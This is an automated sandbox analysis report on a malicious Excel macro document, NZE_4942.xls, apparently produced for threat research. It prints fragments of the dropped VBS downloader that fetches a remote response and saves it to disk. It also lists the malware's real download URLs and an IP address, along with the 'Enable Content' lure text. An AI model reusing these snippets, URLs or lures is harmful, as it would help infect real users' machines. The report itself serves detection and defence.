Analysis Report NZE_4942.xls

Overview

General Information

Sample Name: NZE_4942.xls
Analysis ID: 289338
MD5: 2a4f47e72368f146cd2fcfc3b595be24
SHA1: 6ab7f3f40717ab49f2bf04f0e62bcc32f91f4efc
SHA256: 1dc66813f21fd098e649bf60a6807d6d1ea5b875cbbb7e593ff92a88a1943a2d

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 2496 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2376 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2532 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2504 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2648 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2708 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Office product drops script at suspicious location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1204, TargetFilename: C:\Users\user\AppData\Local\Temp\lj06.vbs

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://marketingblueprints.club/wp-touch.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://polyet-store.com/wp-touch.php | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: NZE_4942.xls | Virustotal: Detection: 15%

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\iNU7.vbs
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\explorer.exe
Source: global traffic | DNS query: name: loveleigh.seo-and-web-design.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 140.82.62.250:443

Networking:

Potential malicious VBS script found (has network functionality)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped file: sX4IzDE.Open : sX4IzDE.Type = 1 : sX4IzDE.Write jISdL.ResponseBody
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped file: sX4IzDE.SaveToFile "C:\Users\user\AppData\Local\Temp\qJjKE.html",2 : sX4IzDE.Close : Exit For : End If : Next
Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: loveleigh.seo-and-web-design.com
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: http://msbibo.ch/wp-touch.php
Source: explorer.exe, 00000002.00000002.2098930430.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2226707649.0000000001C20000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2105931995.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2233143043.0000000001DB0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000003.00000002.2227442629.00000000028B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.2099096218.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.2116606678.0000000001C30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000002.00000002.2098930430.0000000001C30000.00000002.00000001.sdmp, explorer.exe, 00000003.00000002.2226707649.0000000001C20000.00000002.00000001.sdmp, explorer.exe, 00000005.00000002.2105931995.0000000001C60000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2233143043.0000000001DB0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: wscript.exe, 00000007.00000002.2121359892.0000000005FE7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: https://loveleigh.seo-and-web-design.com/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: https://loveleigh.seo-and-web-design.com/wp-touch.phpz
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: https://marketingblueprints.club/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: https://polyet-store.com/wp-touch.php
Source: wscript.exe, 00000007.00000002.2116590240.0000000000446000.00000004.00000001.sdmp | String found in binary or memory: https://polyet-store.com/wp-touch.phpp
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing' and 'Enable Content' 12 13 14 15 16 17 18 " 20 21 22 23 24 25 26 m
Source: Screenshot number: 4 | Screenshot OCR: Protected document 7 8 9 10 11 In order to view the document, you must press buttons 'Enable Ed
Source: Screenshot number: 4 | Screenshot OCR: Enable Content' 12 13 14 15 16 17 18 " 20 21 22 23 24 25 26 m m 'GJ ',9 "0],| U
Found Excel 4.0 Macro with suspicious formulas
Source: NZE_4942.xls | Initial sample: WORKSPACE
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\iNU7.vbs
Potential malicious VBS script found (suspicious strings)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped file: HGURV = Array(kmr,xLO,YLjFcGA,LmXG) : Dim jISdL : Set jISdL = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Source: NZE_4942.xls | OLE indicator, VBA macros: true
Source: wscript.exe, 00000007.00000002.2121123697.0000000005E00000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.expl.evad.winXLS@11/8@2/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\D2EE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD900.tmp
Source: NZE_4942.xls | OLE indicator, Workbook stream: true
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\explorer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: NZE_4942.xls | Virustotal: Detection: 15%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs'
Source: unknown | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbs
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\lj06.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\iNU7.vbs
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\lj06.vbs'
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\iNU7.vbs'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\explorer.exe TID: 2304 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2500 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2584 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2764 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 260 | Thread sleep time: -60000s >= -30000s
Source: explorer.exe, 00000006.00000003.2105048811.00000000002FA000.00000004.00000001.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 140.82.62.250 187
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2496 base: 50000 value: 01
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2496 base: 50020 value: 9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2496 base: 7FFFFFD9368 value: 00
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2376 base: 50000 value: 01
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2376 base: 50020 value: 9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2376 base: 7FFFFFD8368 value: 00
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting321Path InterceptionProcess Injection21Masquerading1OS Credential DumpingSecurity Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection21NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting321LSA SecretsSystem Information Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
